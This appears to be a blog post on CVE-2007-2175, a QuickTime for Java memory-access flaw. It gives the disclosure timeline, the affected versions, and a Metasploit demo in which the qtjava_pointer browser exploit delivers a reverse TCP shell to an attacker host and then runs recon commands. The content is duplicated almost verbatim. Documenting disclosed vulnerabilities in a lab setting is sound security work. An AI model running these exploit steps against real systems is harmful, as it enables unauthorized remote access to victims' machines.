Vulnerability discovered by Shane Macaulay & Dino Dai Zovi during CanSecWest 2007
Vulnerability reported to ZDI by Dino A. Dai Zovi & Shane Macaulay
Vulnerability reported to the vendor by ZDI the 2007-04-23
Coordinated vulnerability disclosure the 2007-05-01
Metasploit PoC provided the 2007-05-29
PoC provided by:
hdm
kf
ddz
Reference(s) :
CVE-2007-2175
ZDI-07-023
Affected versions :
QuickTime 7 previous version 7.1.6 for Windows and OS X
Tested on Windows XP SP3 with QuickTime 7.1.5
Description :
This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.
Metasploit demo :
use exploit/multi/browser/qtjava_pointer
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
Vulnerability reported to ZDI by Dino A. Dai Zovi & Shane Macaulay
Vulnerability reported to the vendor by ZDI the 2007-04-23
Coordinated vulnerability disclosure the 2007-05-01
Metasploit PoC provided the 2007-05-29
PoC provided by:
hdm
kf
ddz
Reference(s) :
CVE-2007-2175
ZDI-07-023
Affected versions :
QuickTime 7 previous version 7.1.6 for Windows and OS X
Tested on Windows XP SP3 with QuickTime 7.1.5
Description :
This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.
Metasploit demo :
use exploit/multi/browser/qtjava_pointer
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
Thaank you for writing this
ReplyDelete